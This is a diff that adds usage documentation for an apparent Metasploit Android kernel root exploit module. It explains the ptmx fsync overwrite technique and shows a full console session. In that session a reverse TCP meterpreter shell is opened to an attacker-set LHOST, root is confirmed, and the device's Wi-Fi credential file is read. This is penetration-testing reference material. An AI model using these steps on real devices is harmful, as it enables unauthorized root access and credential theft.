|
| 1 | +## Intro |
| 2 | + |
| 3 | +This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps. |
| 4 | + |
| 5 | +The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit. |
| 6 | + |
| 7 | +This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targetted. |
| 8 | + |
| 9 | +## Usage |
| 10 | + |
| 11 | +You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the ```SESSION``` option and configure the handler. The exploit can take a while to run on the device so it is configured with ```WfsDelay``` option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable. |
| 12 | + |
| 13 | +An example session follows: |
| 14 | + |
| 15 | + |
| 16 | +``` |
| 17 | +msf exploit(handler) > sessions |
| 18 | +
|
| 19 | +Active sessions |
| 20 | +=============== |
| 21 | +
|
| 22 | + Id Type Information Connection |
| 23 | + -- ---- ----------- ---------- |
| 24 | + 1 meterpreter dalvik/android u0_a132 @ localhost 192.168.1.52:4444 -> 192.168.1.54:33549 (192.168.1.54) |
| 25 | +
|
| 26 | +
|
| 27 | +msf exploit(handler) > use exploit/android/local/put_user_vroot |
| 28 | +
|
| 29 | +msf exploit(put_user_vroot) > set LHOST 192.168.1.52 |
| 30 | +LHOST => 192.168.1.52 |
| 31 | +
|
| 32 | +msf exploit(put_user_vroot) > set LPORT 5555 |
| 33 | +LPORT => 5555 |
| 34 | +
|
| 35 | +msf exploit(put_user_vroot) > set SESSION 1 |
| 36 | +SESSION => 1 |
| 37 | +
|
| 38 | +msf exploit(put_user_vroot) > run |
| 39 | +
|
| 40 | +[*] Started reverse TCP handler on 192.168.1.52:5555 |
| 41 | +[*] Loading exploit library /data/data/com.metasploit.stage/files/bwycy |
| 42 | +[*] Loaded library /data/data/com.metasploit.stage/files/bwycy, deleting |
| 43 | +[*] Waiting 120 seconds for payload |
| 44 | +[*] Sending stage (388156 bytes) to 192.168.1.54 |
| 45 | +[*] Meterpreter session 2 opened (192.168.1.52:5555 -> 192.168.1.54:59580) at 2016-12-24 00:19:12 +0800 |
| 46 | +
|
| 47 | +
|
| 48 | +meterpreter > getuid |
| 49 | +Server username: uid=0, gid=0, euid=0, egid=0 |
| 50 | +
|
| 51 | +meterpreter > cat /data/misc/wifi/wpa_supplicant.conf |
| 52 | +ctrl_interface=wlan0 |
| 53 | +... |
| 54 | +
|
| 55 | +``` |
0 commit comments